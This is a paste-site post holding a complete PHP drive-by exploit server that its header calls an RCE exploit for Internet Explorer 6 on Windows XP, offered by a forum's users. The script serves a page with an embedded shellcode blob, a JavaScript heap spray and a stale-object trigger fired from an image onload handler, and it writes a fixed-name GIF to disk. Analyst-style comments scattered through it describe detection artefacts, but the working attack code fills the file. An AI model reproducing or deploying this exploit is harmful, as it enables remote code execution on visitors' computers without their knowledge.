Paste #683
Posted by: 18/05/2026
Posted on: 2026-05-18 10:44:40
<?php
// ================================================
// RCE Exploit for Internet Explorer 6.
// Works on Windows XP (all SPs)
//
// Made by www.downgrade-net.ru users. Join us!
//
// Problems?
// http://www.downgrade-net.ru/forum/topic.php?id=598
// ================================================
class RequestHandler {
// Converts a Python-style byte listing (`buf += b"\x.."` lines) into a string
// of `%uXXXX` escapes, the form the generated page hands to unescape().
//
// $python_buf: text of the listing. Returns the escape string.
//
// Analyst note: the returned text is interpolated unchanged into a <script>
// block by get_exploit(), so it can be matched byte-for-byte in captured
// HTTP responses or cached copies of the page.
private function payload_cnv($python_buf) {
// Drop the `buf =` / `buf +=` prefixes together with the opening b" of each line.
$clean = preg_replace('/buf\s*\+?=\s*b?"?/', '', $python_buf);
// Drop the remaining quotes, whitespace and semicolons.
$clean = preg_replace('/["\s;]/', '', $clean);
// Keep hex digits only; this also discards the `\x` markers.
$hex = preg_replace('/[^0-9a-fA-F]/', '', $clean);
$binary = hex2bin($hex);
$enc_payload = '';
$len = strlen($binary);
// Walk the bytes two at a time; each pair becomes one 16-bit unit.
for ($i = 0; $i < $len; $i += 2) {
$num = 0;
for ($j = 0; $j < 2; $j++) {
if ($i + $j < $len) {
// First byte of the pair goes in the low 8 bits, second in the high 8 bits.
$num += (ord($binary[$i + $j]) & 0xFF) << ($j * 8);
}
}
$enc_payload .= sprintf('%%u%04x', $num);
}
// Odd byte count: the loop already emitted the last byte with a zero high
// half; one further all-zero unit is appended here.
if ($len % 2 == 1) {
$enc_payload .= '%u0000';
}
return $enc_payload;
}
// Packs a raw byte string into `%uXXXX` escapes, two bytes per unit with the
// first byte in the low 8 bits (the same packing payload_cnv() performs
// after its hex decoding).
//
// $payload: raw bytes. Returns the escape string.
//
// No call to this private method appears anywhere in the class, so it is
// unused in this file.
private function convert_to_utf16($payload) {
$enc_payload = '';
$len = strlen($payload);
for ($i = 0; $i < $len; $i += 2) {
$num = 0;
for ($j = 0; $j < 2; $j++) {
// A trailing single byte is emitted with a zero high half.
if ($i + $j < $len) {
$num += (ord($payload[$i + $j]) & 0xFF) << ($j * 8);
}
}
$enc_payload .= sprintf('%%u%04x', $num);
}
return $enc_payload;
}
// Returns the embedded byte listing converted to `%uXXXX` escapes by
// payload_cnv().
//
// NOTE(review): what these bytes do when executed cannot be determined from
// this file. The file header describes the page as an RCE exploit, so this
// is presumably the code intended to run in the visitor's browser process;
// treat the blob as hostile and examine it only in an isolated analysis
// environment.
private function get_payload() {
// Single-quoted PHP string: the `\x..` sequences stay literal text here and
// are only turned into bytes later, inside payload_cnv().
$python_buf = '
buf = b""
buf += b"\xb8\x1d\x7e\x57\xc7\xda\xd3\xd9\x74\x24\xf4\x5e\x29"
buf += b"\xc9\xb1\x3e\x83\xee\xfc\x31\x46\x11\x03\x46\x11\xe2"
buf += b"\xe8\xc0\x62\x59\xb2\x25\x54\xaa\x6b\x21\x42\xc1\xd4"
buf += b"\xfb\x43\x98\xd2\x78\x94\xdf\x13\x08\x15\xe3\x11\x66"
buf += b"\x6b\x0e\xe3\xe1\x54\x29\xf1\x48\xb8\x16\x73\xe6\x6a"
buf += b"\x2f\x3c\xba\x8f\x39\x54\xae\x52\xd3\x40\x5f\x72\x9e"
buf += b"\x0b\x58\x80\x00\x73\x83\x0e\xc4\x2e\xdb\x53\x07\xa3"
buf += b"\xfd\xef\x3c\xa4\xd5\x1e\x5c\xd5\xd3\xfc\x36\xdd\xd6"
buf += b"\x69\xd6\xab\x48\xdc\x83\x28\x0f\x9a\x59\x70\x33\x4f"
buf += b"\xfb\xb0\x9a\xb0\x6f\x4d\xc8\x99\x0a\x2a\x16\x7b\xb3"
buf += b"\xa4\xae\x75\x3a\x31\xca\x1e\x54\x0b\xba\xf7\x0e\x1f"
buf += b"\x0c\xc0\xdf\xbe\x31\x00\x0f\xb3\x01\xdd\x5d\x78\x00"
buf += b"\x23\x5b\xb4\xed\xeb\xcf\xaa\x81\x28\x6a\x58\x4c\xd5"
buf += b"\x5a\xf5\xbd\xee\x18\xfe\xce\xc0\xab\x33\x56\xc1\xcd"
buf += b"\xc1\x70\x0a\x89\x1c\x4d\x4f\xcc\x4e\x15\x66\xfd\x11"
buf += b"\x1c\xc4\xa9\xf6\x90\x17\x42\xc6\x21\x6c\xa3\x4d\xed"
buf += b"\x72\x0b\x9e\xa1\x14\x0a\xf7\x80\xf2\x8f\xa6\x33\x94"
buf += b"\xe5\x61\x8e\xae\x94\xc8\xb7\x47\xd7\x74\x2a\x81\x3b"
buf += b"\xe4\x22\x2d\x7b\xfc\xa4\xe8\x2d\x19\x06\xb2\xf4\x9d"
buf += b"\xc7\x95\x83\x22\x22\xf0\xd8\xa7\x40\x24\x79\xa0\x2e"
buf += b"\xd4\x0c\x92\x20\xd2\x2a\xa2\x4d\xbc\xd2\x37\x16\xe7"
buf += b"\x3a"
';
return $this->payload_cnv($python_buf);
}
// Writes the placeholder image ququnta_zoofil.gif into the current working
// directory unless a file of that name already exists.
//
// Analyst notes: the file name is a fixed string, so its presence on a web
// host is a filesystem artefact of this script having run there. On a write
// failure the script emits an HTML comment beginning
// "<!-- Failed to create ququnta_zoofil.gif" into the response body.
private function create_gif_file() {
// Base64 of a GIF89a image whose header declares a 1x1 canvas.
$gif_content = base64_decode('R0lGODlhAQABAIAAAP///wAAACwAAAAAAQABAAACAkQBADs=');
// Relative path: resolved against the process working directory.
$filename = 'ququnta_zoofil.gif';
if (!file_exists($filename)) {
if (file_put_contents($filename, $gif_content) !== false) {
// Owner read/write, everyone else read-only.
chmod($filename, 0644);
} else {
echo "<!-- Failed to create $filename. Check folder permissions!!! -->\n";
}
}
}
// Builds the HTML page that handle() sends for '/' and for any URI containing
// '.php'. Returns the page as a string.
//
// Side effect: calls create_gif_file(), so building the page may write
// ququnta_zoofil.gif into the working directory.
//
// Analyst notes (everything listed is visible in the markup below and can be
// matched in captured responses or cached copies of the page):
//   - two unescape() calls over %u-escaped text: the converted payload and
//     the filler unit %u0a0a%u0a0a;
//   - spray_heap() doubles the filler until it reaches 0x80000 characters,
//     trims it, and stores 200 filler+payload strings in heap_chunks;
//   - initialize() creates 200 COMMENT elements; ev1(), run from the <img>
//     onload handler, copies the event with createEventObject(), empties the
//     parent <span id="sp1"> and schedules ev2() every 1 ms; ev2() overwrites
//     each COMMENT's data and then reads event_obj.srcElement;
//   - check() tests for "MSIE" in navigator.userAgent inside the browser, so
//     every other client is redirected to about:blank only after it has
//     already received the complete page.
// NOTE(review): reading srcElement after the image's parent markup has been
// cleared looks like a stale-object access. The file header calls the page an
// RCE exploit for Internet Explorer 6, but the underlying flaw is not named
// anywhere in this file - confirm against vendor advisories before labelling.
private function get_exploit() {
$this->create_gif_file();
$payload = $this->get_payload();
// Filler unit repeated by the page's script; also hard-coded again in ev2().
$nop = '%u0a0a%u0a0a';
// Heredoc: {$payload} and {$nop} are interpolated, the rest is sent verbatim.
$html = <<<HTML
<html>
<head>
<script>
var obj, event_obj;
function spray_heap()
{
var chunk_size = 0x80000;
var payload = unescape("{$payload}");
var nopsled = unescape("{$nop}");
while (nopsled.length < chunk_size)
nopsled += nopsled;
var nopsled_len = chunk_size - (payload.length + 20);
nopsled = nopsled.substring(0, nopsled_len);
heap_chunks = new Array();
for (var i = 0 ; i < 200 ; i++)
heap_chunks[i] = nopsled + payload;
}
function initialize()
{
obj = new Array();
event_obj = null;
for (var i = 0; i < 200 ; i++ )
obj[i] = document.createElement("COMMENT");
}
function ev1(evt)
{
event_obj = document.createEventObject(evt);
document.getElementById("sp1").innerHTML = "";
window.setInterval(ev2, 1);
}
function ev2()
{
var data = "";
var tmp = unescape("%u0a0a%u0a0a");
for (var i = 0 ; i < 4 ; i++)
data += tmp;
for (i = 0 ; i < obj.length ; i++ ) {
obj[i].data = data;
}
event_obj.srcElement;
}
function check()
{
if (navigator.userAgent.indexOf("MSIE") == -1)
return false;
return true;
}
if (check()) {
initialize();
spray_heap();
}
else
window.location = 'about:blank';
</script>
</head>
<body>
<span id="sp1">
<img src="ququnta_zoofil.gif" onload="ev1(event)">
</span>
</body>
</html>
HTML;
return $html;
}
// Routes the current request by substring-matching $_SERVER['REQUEST_URI']
// and writes the response directly to output.
//
//   '/' or any URI containing '.php'         -> the page from get_exploit()
//   any URI containing 'ququnta_zoofil.gif'  -> the placeholder GIF
//   anything else                            -> 404 with body "Not Found"
//
// Analyst notes: no request header is inspected on the server side, so a
// fetch of '/' with any user agent returns the full page; that makes the
// response body usable for content-based detection by a proxy or scanner.
// The matching is by substring, so a '.php' anywhere in the URI (path or
// query string) selects the first branch.
public function handle() {
// Fall back to '/' when the server variable is absent.
$uri = $_SERVER['REQUEST_URI'] ?? '/';
if ($uri === '/' || strpos($uri, '.php') !== false) {
header('Content-Type: text/html; charset=utf-8');
echo $this->get_exploit();
}
elseif (strpos($uri, 'ququnta_zoofil.gif') !== false) {
// The image is decoded from the same base64 literal used in
// create_gif_file() and served from memory; the on-disk copy is not read here.
$gif = base64_decode('R0lGODlhAQABAIAAAP///wAAACwAAAAAAQABAAACAkQBADs=');
header('Content-Type: image/gif');
header('Content-Length: ' . strlen($gif));
echo $gif;
}
else {
http_response_code(404);
echo "Not Found";
}
}
}
// Entry point: every request that reaches this script is answered by
// RequestHandler::handle(). Nothing in this file restricts who may request
// the page or records that it was served.
$handler = new RequestHandler();
$handler->handle();
?>